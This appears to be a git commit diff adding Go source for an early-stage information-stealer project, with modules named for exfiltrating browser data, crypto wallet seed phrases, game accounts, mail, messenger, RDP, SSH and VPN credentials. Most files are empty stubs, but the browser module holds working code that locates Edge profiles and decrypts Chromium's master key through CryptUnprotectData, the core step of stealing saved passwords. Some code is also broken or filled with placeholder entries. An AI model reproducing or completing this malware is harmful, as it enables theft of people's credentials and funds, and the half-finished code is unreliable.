Upload of project source code files.

2026-02-17 04:01:29 +01:00
parent 8eee3bb938
commit 38704ce1ad
76 changed files with 257 additions and 0 deletions
--- a/modules/exfil/browser/browser.go
+++ b/modules/exfil/browser/browser.go
@@ -0,0 +1,5 @@
+package browser
+
+func Main() {
+	chromium()
+}
--- a/modules/exfil/browser/chromium.go
+++ b/modules/exfil/browser/chromium.go
@@ -0,0 +1,47 @@
+package browser
+
+import (
+	"adderall/utils"
+	"fmt"
+	"path/filepath"
+)
+
+func chromium() {
+	fmt.Println("[*] Executing Browser Stealer: Chromium.")
+
+	profiles := []string{"Default", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5"}
+	paths := map[string]string{
+		"Microsoft Edge": "Microsoft\\Edge",
+		"name":           "John",
+		"age":            "30",
+	}
+
+	for name, path := range paths {
+		path = filepath.Join(utils.LocalAppData, path, "User Data")
+
+		if utils.FileOrDirExists(path) {
+			fmt.Printf("[*] Main browser dir %s exists.\n", path)
+
+			localState := filepath.Join(path, "Local State")
+
+			if utils.FileOrDirExists(localState) {
+				fmt.Printf("[*] LocalState file %s exists. Retrieving key...\n", localState)
+
+				result := make(chan []byte)
+
+				go getMasterKey(localState, result)
+
+				fmt.Printf("[*] Received key from LocalState file %s: %d.\n", localState, <-result)
+
+				for _, profile := range profiles {
+					path = filepath.Join(path, profile)
+
+					if utils.FileOrDirExists(path) {
+						fmt.Printf("[*] \"%s\" exists. Retrieving Retrieving login data...\n", path)
+						fmt.Println(name)
+					}
+				}
+			}
+		}
+	}
+}
--- a/modules/exfil/browser/cryptography.go
+++ b/modules/exfil/browser/cryptography.go
@@ -0,0 +1,79 @@
+package browser
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"os"
+	"syscall"
+	"unicode/utf8"
+	"unsafe"
+)
+
+var (
+	crypt32                = syscall.NewLazyDLL("crypt32.dll")
+	kernel32               = syscall.NewLazyDLL("kernel32.dll")
+	procCryptUnprotectData = crypt32.NewProc("CryptUnprotectData")
+	procLocalFree          = kernel32.NewProc("LocalFree")
+)
+
+type DataBlob struct {
+	cbData uint32
+	pbData *byte
+}
+
+func getMasterKey(path string, result chan<- []byte) {
+	var encryptedBase64Key struct {
+		OSCrypt struct {
+			EncryptedKey string `json:"encrypted_key"`
+		} `json:"os_crypt"`
+	}
+
+	file, err := os.ReadFile(path)
+	if err != nil {
+		fmt.Printf("[!] Error reading LocalState file %s: %s\n", path, err)
+	}
+
+	if err := json.Unmarshal(file, &encryptedBase64Key); err != nil {
+		fmt.Printf("[!] Error parsing JSON: %s\n", err)
+	}
+
+	encryptedKey, err := base64.StdEncoding.DecodeString(encryptedBase64Key.OSCrypt.EncryptedKey)
+	if err != nil {
+		fmt.Printf("[!] Error decoding base64: %s\n", err)
+	}
+
+	for i := 0; i < 5; i++ {
+		_, size := utf8.DecodeRune(encryptedKey)
+		encryptedKey = encryptedKey[size:]
+	}
+
+	encryptedBlob := DataBlob{
+		cbData: uint32(len(encryptedKey)),
+		pbData: &encryptedKey[0],
+	}
+
+	var outBlob DataBlob
+
+	ret, _, err := procCryptUnprotectData.Call(
+		uintptr(unsafe.Pointer(&encryptedBlob)),
+		0,
+		0,
+		0,
+		0,
+		0,
+		uintptr(unsafe.Pointer(&outBlob)),
+	)
+
+	if ret == 0 {
+		fmt.Println("[!] CryptUnprotectData failed:", err)
+		return
+	}
+
+	decryptedKey := make([]byte, outBlob.cbData)
+	copy(decryptedKey, (*[1 << 20]byte)(unsafe.Pointer(outBlob.pbData))[:outBlob.cbData:outBlob.cbData])
+
+	procLocalFree.Call(uintptr(unsafe.Pointer(outBlob.pbData)))
+
+	result <- decryptedKey
+}
--- a/modules/exfil/browser/gecko.go
+++ b/modules/exfil/browser/gecko.go
@@ -0,0 +1 @@
+package browser
--- a/modules/exfil/file/common.go
+++ b/modules/exfil/file/common.go
@@ -0,0 +1 @@
+package file
--- a/modules/exfil/file/file.go
+++ b/modules/exfil/file/file.go
@@ -0,0 +1 @@
+package file
--- a/modules/exfil/file/important.go
+++ b/modules/exfil/file/important.go
@@ -0,0 +1 @@
+package file
--- a/modules/exfil/game/accounts.go
+++ b/modules/exfil/game/accounts.go
@@ -0,0 +1 @@
+package game
--- a/modules/exfil/game/game.go
+++ b/modules/exfil/game/game.go
@@ -0,0 +1 @@
+package game
--- a/modules/exfil/game/saves.go
+++ b/modules/exfil/game/saves.go
@@ -0,0 +1 @@
+package game
--- a/modules/exfil/mail/mail.go
+++ b/modules/exfil/mail/mail.go
@@ -0,0 +1 @@
+package mail
--- a/modules/exfil/messenger/messenger.go
+++ b/modules/exfil/messenger/messenger.go
@@ -0,0 +1 @@
+package messenger
--- a/modules/exfil/network/adapters.go
+++ b/modules/exfil/network/adapters.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/network/monitor.go
+++ b/modules/exfil/network/monitor.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/network/network.go
+++ b/modules/exfil/network/network.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/network/rdp.go
+++ b/modules/exfil/network/rdp.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/network/ssh.go
+++ b/modules/exfil/network/ssh.go
@@ -0,0 +1 @@
+package network
--- a/modules/exfil/system/system.go
+++ b/modules/exfil/system/system.go
@@ -0,0 +1 @@
+package system
--- a/modules/exfil/vpn/vpn.go
+++ b/modules/exfil/vpn/vpn.go
@@ -0,0 +1 @@
+package vpn
--- a/modules/exfil/wallet/seedphrase.go
+++ b/modules/exfil/wallet/seedphrase.go
@@ -0,0 +1 @@
+package wallet
--- a/modules/exfil/wallet/wallet.go
+++ b/modules/exfil/wallet/wallet.go
@@ -0,0 +1 @@
+package wallet